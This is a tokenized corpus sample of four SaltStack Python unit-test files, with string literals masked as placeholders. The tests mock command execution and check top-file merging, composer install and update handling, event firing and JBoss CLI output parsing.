<s> from __future__ import absolute_import <EOL> import os <EOL> import os . path <EOL> import tempfile <EOL> from salttesting import TestCase <EOL> from salttesting . mock import patch , MagicMock <EOL> from salttesting . helpers import ensure_in_syspath <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> import integration <EOL> import salt . config <EOL> from salt . state import HighState <EOL> from salt . utils . odict import OrderedDict , DefaultOrderedDict <EOL> class HighStateTestCase ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . root_dir = tempfile . mkdtemp ( dir = integration . TMP ) <EOL> self . state_tree_dir = os . path . join ( self . root_dir , '<STR_LIT>' ) <EOL> self . cache_dir = os . path . join ( self . root_dir , '<STR_LIT>' ) <EOL> if not os . path . isdir ( self . root_dir ) : <EOL> os . makedirs ( self . root_dir ) <EOL> if not os . path . isdir ( self . state_tree_dir ) : <EOL> os . makedirs ( self . state_tree_dir ) <EOL> if not os . path . isdir ( self . cache_dir ) : <EOL> os . makedirs ( self . cache_dir ) <EOL> self . config = salt . config . minion_config ( None ) <EOL> self . config [ '<STR_LIT>' ] = self . root_dir <EOL> self . config [ '<STR_LIT>' ] = False <EOL> self . config [ '<STR_LIT:id>' ] = '<STR_LIT>' <EOL> self . config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . config [ '<STR_LIT>' ] = dict ( base = [ self . state_tree_dir ] ) <EOL> self . config [ '<STR_LIT>' ] = self . cache_dir <EOL> self . config [ '<STR_LIT:test>' ] = False <EOL> self . highstate = HighState ( self . config ) <EOL> self . highstate . push_active ( ) <EOL> def tearDown ( self ) : <EOL> self . highstate . pop_active ( ) <EOL> def test_top_matches_with_list ( self ) : <EOL> top = { '<STR_LIT>' : { '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT>' : [ '<STR_LIT>' ] } } <EOL> matches = self . highstate . top_matches ( top ) <EOL> self . assertEqual ( matches , { '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] } ) <EOL> def test_top_matches_with_string ( self ) : <EOL> top = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } } <EOL> matches = self . highstate . top_matches ( top ) <EOL> self . assertEqual ( matches , { '<STR_LIT>' : [ '<STR_LIT>' ] } ) <EOL> def test_matches_whitelist ( self ) : <EOL> matches = { '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] } <EOL> matches = self . highstate . matches_whitelist ( matches , [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( matches , { '<STR_LIT>' : [ '<STR_LIT>' ] } ) <EOL> def test_matches_whitelist_with_string ( self ) : <EOL> matches = { '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] } <EOL> matches = self . highstate . matches_whitelist ( matches , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( matches , { '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] } ) <EOL> class TopFileMergeTestCase ( TestCase ) : <EOL> '''<STR_LIT>''' <EOL> def setUp ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . env1 = { '<STR_LIT>' : { '<STR_LIT:*>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] } } <EOL> self . env2 = { '<STR_LIT>' : { '<STR_LIT:*>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] } } <EOL> self . env3 = { '<STR_LIT>' : { '<STR_LIT:*>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] } } <EOL> self . config = self . _make_default_config ( ) <EOL> self . highstate = HighState ( self . config ) <EOL> def _make_default_config ( self ) : <EOL> config = salt . config . minion_config ( None ) <EOL> root_dir = tempfile . mkdtemp ( dir = integration . TMP ) <EOL> state_tree_dir = os . path . join ( root_dir , '<STR_LIT>' ) <EOL> cache_dir = os . path . join ( root_dir , '<STR_LIT>' ) <EOL> config [ '<STR_LIT>' ] = root_dir <EOL> config [ '<STR_LIT>' ] = False <EOL> config [ '<STR_LIT:id>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] = dict ( base = [ state_tree_dir ] ) <EOL> config [ '<STR_LIT>' ] = cache_dir <EOL> config [ '<STR_LIT:test>' ] = False <EOL> return config <EOL> def _get_tops ( self ) : <EOL> '''<STR_LIT>''' <EOL> tops = DefaultOrderedDict ( list ) <EOL> tops [ '<STR_LIT:a>' ] . append ( self . env1 ) <EOL> tops [ '<STR_LIT:b>' ] . append ( self . env2 ) <EOL> tops [ '<STR_LIT:c>' ] . append ( self . env3 ) <EOL> return tops <EOL> def test_basic_merge ( self ) : <EOL> '''<STR_LIT>''' <EOL> merged_tops = self . highstate . merge_tops ( self . _get_tops ( ) ) <EOL> expected_merge = DefaultOrderedDict ( OrderedDict ) <EOL> expected_merge [ '<STR_LIT>' ] [ '<STR_LIT:*>' ] = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . assertEqual ( merged_tops , expected_merge ) <EOL> def test_merge_strategy_same ( self ) : <EOL> '''<STR_LIT>''' <EOL> config = self . _make_default_config ( ) <EOL> config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] = '<STR_LIT:b>' <EOL> highstate = HighState ( config ) <EOL> ret = highstate . get_tops ( ) <EOL> self . assertEqual ( ret , OrderedDict ( [ ( '<STR_LIT:b>' , [ { } ] ) ] ) ) <EOL> def test_ordered_merge ( self ) : <EOL> '''<STR_LIT>''' <EOL> config = self . _make_default_config ( ) <EOL> config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] = [ '<STR_LIT:b>' , '<STR_LIT:a>' , '<STR_LIT:c>' ] <EOL> with patch ( '<STR_LIT>' , MagicMock ( return_value = [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' ] ) ) : <EOL> highstate = HighState ( config ) <EOL> ret = highstate . get_tops ( ) <EOL> self . assertEqual ( ret , OrderedDict ( [ ( '<STR_LIT:a>' , [ { } ] ) , ( '<STR_LIT:c>' , [ { } ] ) , ( '<STR_LIT:b>' , [ { } ] ) ] ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( HighStateTestCase , needs_daemon = False ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> from salttesting import TestCase , skipIf <EOL> from salttesting . mock import ( <EOL> MagicMock , <EOL> patch , <EOL> NO_MOCK , <EOL> NO_MOCK_REASON <EOL> ) <EOL> from salt . modules import composer <EOL> from salt . exceptions import CommandExecutionError , CommandNotFoundError , SaltInvocationError <EOL> composer . __grains__ = { } <EOL> composer . __salt__ = { } <EOL> composer . __context__ = { } <EOL> composer . __opts__ = { } <EOL> @ skipIf ( NO_MOCK , NO_MOCK_REASON ) <EOL> class ComposerTestCase ( TestCase ) : <EOL> '''<STR_LIT>''' <EOL> def test_install ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = False ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> self . assertRaises ( CommandNotFoundError , composer . install , '<STR_LIT:d>' ) <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> self . assertRaises ( SaltInvocationError , composer . install , None ) <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : '<STR_LIT:A>' } ) <EOL> with patch . dict ( composer . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertRaises ( CommandExecutionError , composer . install , '<STR_LIT:d>' ) <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT:A>' } ) <EOL> with patch . dict ( composer . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertTrue ( composer . install ( '<STR_LIT>' , None , None , None , None , <EOL> None , None , None , None , None , <EOL> True ) ) <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> rval = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT:A>' , '<STR_LIT>' : '<STR_LIT:B>' } <EOL> mock = MagicMock ( return_value = rval ) <EOL> with patch . dict ( composer . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertEqual ( composer . install ( '<STR_LIT>' ) , rval ) <EOL> def test_update ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = False ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> self . assertRaises ( CommandNotFoundError , composer . update , '<STR_LIT:d>' ) <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> self . assertRaises ( SaltInvocationError , composer . update , None ) <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : '<STR_LIT:A>' } ) <EOL> with patch . dict ( composer . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertRaises ( CommandExecutionError , composer . update , '<STR_LIT:d>' ) <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT:A>' } ) <EOL> with patch . dict ( composer . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertTrue ( composer . update ( '<STR_LIT>' , None , None , None , None , <EOL> None , None , None , None , None , <EOL> True ) ) <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> mock = MagicMock ( return_value = False ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT:A>' } ) <EOL> with patch . dict ( composer . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertTrue ( composer . update ( '<STR_LIT>' , None , None , None , None , <EOL> None , None , None , None , None , <EOL> True ) ) <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> rval = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT:A>' , '<STR_LIT>' : '<STR_LIT:B>' } <EOL> mock = MagicMock ( return_value = rval ) <EOL> with patch . dict ( composer . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertEqual ( composer . update ( '<STR_LIT>' ) , rval ) <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> mock = MagicMock ( return_value = False ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> rval = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT:A>' , '<STR_LIT>' : '<STR_LIT:B>' } <EOL> mock = MagicMock ( return_value = rval ) <EOL> with patch . dict ( composer . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertEqual ( composer . update ( '<STR_LIT>' ) , rval ) <EOL> def test_selfupdate ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = False ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> self . assertRaises ( CommandNotFoundError , composer . selfupdate ) <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : '<STR_LIT:A>' } ) <EOL> with patch . dict ( composer . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertRaises ( CommandExecutionError , composer . selfupdate ) <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT:A>' } ) <EOL> with patch . dict ( composer . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertTrue ( composer . selfupdate ( quiet = True ) ) <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> rval = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT:A>' , '<STR_LIT>' : '<STR_LIT:B>' } <EOL> mock = MagicMock ( return_value = rval ) <EOL> with patch . dict ( composer . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertEqual ( composer . selfupdate ( ) , rval ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( ComposerTestCase , needs_daemon = False ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> from salttesting import TestCase , skipIf <EOL> from salttesting . mock import ( <EOL> MagicMock , <EOL> patch , <EOL> NO_MOCK , <EOL> NO_MOCK_REASON <EOL> ) <EOL> from salt . modules import event <EOL> import salt . utils . event <EOL> import sys <EOL> sys . path . append ( '<STR_LIT>' ) <EOL> event . __grains__ = { } <EOL> event . __salt__ = { } <EOL> event . __context__ = { } <EOL> event . __opts__ = { } <EOL> @ skipIf ( NO_MOCK , NO_MOCK_REASON ) <EOL> class EventTestCase ( TestCase ) : <EOL> '''<STR_LIT>''' <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_fire_master ( self , <EOL> salt_crypt_sauth , <EOL> salt_transport_channel_factory ) : <EOL> '''<STR_LIT>''' <EOL> preload = { '<STR_LIT:id>' : '<STR_LIT:id>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:data>' : '<STR_LIT:data>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> with patch . dict ( event . __opts__ , { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:id>' : '<STR_LIT:id>' , <EOL> '<STR_LIT>' : False } ) : <EOL> with patch . object ( salt_transport_channel_factory , '<STR_LIT>' , <EOL> return_value = None ) : <EOL> self . assertTrue ( event . fire_master ( '<STR_LIT:data>' , '<STR_LIT>' ) ) <EOL> with patch . dict ( event . __opts__ , { '<STR_LIT>' : '<STR_LIT:A>' , <EOL> '<STR_LIT:id>' : '<STR_LIT:id>' , <EOL> '<STR_LIT>' : '<STR_LIT:localhost>' , <EOL> '<STR_LIT>' : False } ) : <EOL> with patch . object ( salt_crypt_sauth , '<STR_LIT>' , <EOL> return_value = '<STR_LIT>' ) : <EOL> with patch . object ( salt_transport_channel_factory , '<STR_LIT>' , <EOL> return_value = None ) : <EOL> self . assertTrue ( event . fire_master ( '<STR_LIT:data>' , '<STR_LIT>' , preload ) ) <EOL> with patch . dict ( event . __opts__ , { '<STR_LIT>' : '<STR_LIT:A>' , '<STR_LIT>' : False } ) : <EOL> with patch . object ( salt . utils . event . MinionEvent , '<STR_LIT>' , <EOL> side_effect = Exception ( '<STR_LIT:foo>' ) ) : <EOL> self . assertFalse ( event . fire_master ( '<STR_LIT:data>' , '<STR_LIT>' ) ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_fire ( self , salt_utils_event ) : <EOL> '''<STR_LIT>''' <EOL> with patch . object ( salt_utils_event , '<STR_LIT>' ) : <EOL> self . assertFalse ( event . fire ( '<STR_LIT:data>' , '<STR_LIT>' ) ) <EOL> with patch . dict ( event . __opts__ , { '<STR_LIT>' : True , '<STR_LIT>' : True } ) : <EOL> with patch . object ( salt_utils_event , '<STR_LIT>' ) as mock : <EOL> mock . fire_event = MagicMock ( return_value = True ) <EOL> self . assertTrue ( event . fire ( '<STR_LIT:data>' , '<STR_LIT>' ) ) <EOL> def test_send ( self ) : <EOL> '''<STR_LIT>''' <EOL> with patch . object ( event , '<STR_LIT>' , return_value = '<STR_LIT:B>' ) : <EOL> self . assertEqual ( event . send ( '<STR_LIT>' ) , '<STR_LIT:B>' ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( EventTestCase , needs_daemon = False ) </s>
<s> from __future__ import absolute_import <EOL> import re <EOL> from salttesting . unit import TestCase <EOL> from salttesting . helpers import ensure_in_syspath <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> from salt . modules import jboss7_cli <EOL> from salt . exceptions import CommandExecutionError <EOL> try : <EOL> __salt__ <EOL> except NameError : <EOL> from salt . ext . six . moves import builtins as __builtin__ <EOL> __builtin__ . __salt__ = { } <EOL> class CmdMock ( object ) : <EOL> commands = [ ] <EOL> command_response_func = None <EOL> cli_commands = [ ] <EOL> default_response = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '''<STR_LIT>''' , '<STR_LIT>' : '<STR_LIT>' } <EOL> def __init__ ( self , command_response_func = None ) : <EOL> self . command_response_func = command_response_func <EOL> def run_all ( self , command ) : <EOL> self . commands . append ( command ) <EOL> if self . command_response_func is not None : <EOL> return self . command_response_func ( command ) <EOL> cli_command = self . __get_cli_command ( command ) <EOL> self . cli_commands . append ( cli_command ) <EOL> return self . default_response <EOL> @ staticmethod <EOL> def __get_cli_command ( command ) : <EOL> command_re = re . compile ( r'<STR_LIT>' , re . DOTALL ) <EOL> m = command_re . search ( command ) <EOL> if m : <EOL> cli_command = m . group ( <NUM_LIT:1> ) <EOL> return cli_command <EOL> return None <EOL> def get_last_command ( self ) : <EOL> if len ( self . commands ) > <NUM_LIT:0> : <EOL> return self . commands [ - <NUM_LIT:1> ] <EOL> else : <EOL> return None <EOL> def get_last_cli_command ( self ) : <EOL> if len ( self . cli_commands ) > <NUM_LIT:0> : <EOL> return self . cli_commands [ - <NUM_LIT:1> ] <EOL> else : <EOL> return None <EOL> def clear ( self ) : <EOL> self . commands = [ ] <EOL> self . command_response_func = None <EOL> self . cli_commands = [ ] <EOL> class JBoss7CliTestCase ( TestCase ) : <EOL> org_cmd_run_all = None <EOL> cmd = CmdMock ( ) <EOL> jboss_config = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> def setUp ( self ) : <EOL> self . cmd . clear ( ) <EOL> if '<STR_LIT>' in __salt__ : <EOL> self . org_cmd_run_all = __salt__ [ '<STR_LIT>' ] <EOL> __salt__ [ '<STR_LIT>' ] = self . cmd . run_all <EOL> def tearDown ( self ) : <EOL> if self . org_cmd_run_all is not None : <EOL> __salt__ [ '<STR_LIT>' ] = self . org_cmd_run_all <EOL> def test_controller_authentication ( self ) : <EOL> jboss7_cli . run_operation ( self . jboss_config , '<STR_LIT>' ) <EOL> self . assertEqual ( self . cmd . get_last_command ( ) , '<STR_LIT>' ) <EOL> def test_controller_without_authentication ( self ) : <EOL> jboss_config = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> jboss7_cli . run_operation ( jboss_config , '<STR_LIT>' ) <EOL> self . assertEqual ( self . cmd . get_last_command ( ) , '<STR_LIT>' ) <EOL> def test_operation_execution ( self ) : <EOL> operation = r'<STR_LIT>' <EOL> jboss7_cli . run_operation ( self . jboss_config , operation ) <EOL> self . assertEqual ( self . cmd . get_last_command ( ) , r'<STR_LIT>' ) <EOL> def test_handling_jboss_error ( self ) : <EOL> def command_response ( command ) : <EOL> return { '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : r'''<STR_LIT>''' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> self . cmd . command_response_func = command_response <EOL> result = jboss7_cli . run_operation ( self . jboss_config , '<STR_LIT>' ) <EOL> self . assertFalse ( result [ '<STR_LIT:success>' ] ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_handling_cmd_not_exists ( self ) : <EOL> def command_response ( command ) : <EOL> return { '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '''<STR_LIT>''' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> self . cmd . command_response_func = command_response <EOL> try : <EOL> jboss7_cli . run_operation ( self . jboss_config , '<STR_LIT>' ) <EOL> assert False <EOL> except CommandExecutionError as e : <EOL> self . assertTrue ( str ( e ) . startswith ( '<STR_LIT>' ) ) <EOL> def test_handling_other_cmd_error ( self ) : <EOL> def command_response ( command ) : <EOL> return { '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : '''<STR_LIT>''' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> self . cmd . command_response_func = command_response <EOL> try : <EOL> jboss7_cli . run_command ( self . jboss_config , '<STR_LIT>' ) <EOL> self . fail ( '<STR_LIT>' ) <EOL> except CommandExecutionError as e : <EOL> self . assertTrue ( str ( e ) . startswith ( '<STR_LIT>' ) ) <EOL> def test_matches_cli_output ( self ) : <EOL> text = '''<STR_LIT>''' <EOL> self . assertTrue ( jboss7_cli . _is_cli_output ( text ) ) <EOL> def test_not_matches_cli_output ( self ) : <EOL> text = '''<STR_LIT>''' <EOL> self . assertFalse ( jboss7_cli . _is_cli_output ( text ) ) <EOL> def test_parse_flat_dictionary ( self ) : <EOL> text = '''<STR_LIT>''' <EOL> result = jboss7_cli . _parse ( text ) <EOL> self . assertEqual ( len ( result ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_parse_nested_dictionary ( self ) : <EOL> text = '''<STR_LIT>''' <EOL> result = jboss7_cli . _parse ( text ) <EOL> self . assertEqual ( len ( result ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( len ( result [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_parse_string_after_dict ( self ) : <EOL> text = '''<STR_LIT>''' <EOL> result = jboss7_cli . _parse ( text ) <EOL> self . assertTrue ( result [ '<STR_LIT:result>' ] [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_parse_all_datatypes ( self ) : <EOL> text = '''<STR_LIT>''' <EOL> result = jboss7_cli . _parse ( text ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] , '<STR_LIT:success>' ) <EOL> self . assertIsNone ( result [ '<STR_LIT:result>' ] [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( result [ '<STR_LIT:result>' ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( result [ '<STR_LIT:result>' ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( result [ '<STR_LIT:result>' ] [ '<STR_LIT>' ] , False ) <EOL> self . assertTrue ( result [ '<STR_LIT:result>' ] [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_multiline_strings_with_escaped_quotes ( self ) : <EOL> text = r'''<STR_LIT>''' <EOL> result = jboss7_cli . _parse ( text ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertTrue ( result [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] , r'''<STR_LIT>''' ) <EOL> def test_handling_double_backslash_in_return_values ( self ) : <EOL> text = r'''<STR_LIT>''' <EOL> result = jboss7_cli . _parse ( text ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] , '<STR_LIT:success>' ) <EOL> self . assertEqual ( result [ '<STR_LIT:result>' ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( result [ '<STR_LIT:result>' ] [ '<STR_LIT:value>' ] , r'<STR_LIT>' ) <EOL> def test_numbers_without_quotes ( self ) : <EOL> text = r'''<STR_LIT>''' <EOL> result = jboss7_cli . _parse ( text ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] , '<STR_LIT:success>' ) <EOL> self . assertEqual ( result [ '<STR_LIT:result>' ] [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> self . assertIsNone ( result [ '<STR_LIT:result>' ] [ '<STR_LIT>' ] ) <EOL> def test_all_datasource_properties ( self ) : <EOL> text = r'''<STR_LIT>''' <EOL> result = jboss7_cli . _parse ( text ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] , '<STR_LIT:success>' ) <EOL> self . assertEqual ( result [ '<STR_LIT:result>' ] [ '<STR_LIT>' ] , <NUM_LIT:20> ) <EOL> self . assertIsNone ( result [ '<STR_LIT:result>' ] [ '<STR_LIT>' ] ) <EOL> self . assertIsNone ( result [ '<STR_LIT:result>' ] [ '<STR_LIT>' ] ) <EOL> self . assertFalse ( result [ '<STR_LIT:result>' ] [ '<STR_LIT>' ] ) <EOL> def test_datasource_resource_one_attribute_description ( self ) : <EOL> cli_output = '''<STR_LIT>''' <EOL> result = jboss7_cli . _parse ( cli_output ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] , '<STR_LIT:success>' ) <EOL> conn_url_attributes = result [ '<STR_LIT:result>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> self . assertEqual ( conn_url_attributes [ '<STR_LIT:type>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( conn_url_attributes [ '<STR_LIT:description>' ] , '<STR_LIT>' ) <EOL> self . assertTrue ( conn_url_attributes [ '<STR_LIT>' ] ) <EOL> self . assertFalse ( conn_url_attributes [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( conn_url_attributes [ '<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> self . assertEqual ( conn_url_attributes [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> self . assertEqual ( conn_url_attributes [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( conn_url_attributes [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( conn_url_attributes [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_datasource_complete_resource_description ( self ) : <EOL> cli_output = '''<STR_LIT>''' <EOL> result = jboss7_cli . _parse ( cli_output ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] , '<STR_LIT:success>' ) <EOL> conn_url_attributes = result [ '<STR_LIT:result>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> self . assertEqual ( conn_url_attributes [ '<STR_LIT:type>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( conn_url_attributes [ '<STR_LIT:description>' ] , '<STR_LIT>' ) <EOL> self . assertTrue ( conn_url_attributes [ '<STR_LIT>' ] ) <EOL> self . assertFalse ( conn_url_attributes [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( conn_url_attributes [ '<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> self . assertEqual ( conn_url_attributes [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> self . assertEqual ( conn_url_attributes [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( conn_url_attributes [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( conn_url_attributes [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_escaping_operation_with_backslashes_and_quotes ( self ) : <EOL> operation = r'<STR_LIT>' <EOL> jboss7_cli . run_operation ( self . jboss_config , operation ) <EOL> self . assertEqual ( self . cmd . get_last_command ( ) , r'<STR_LIT>' ) </s>
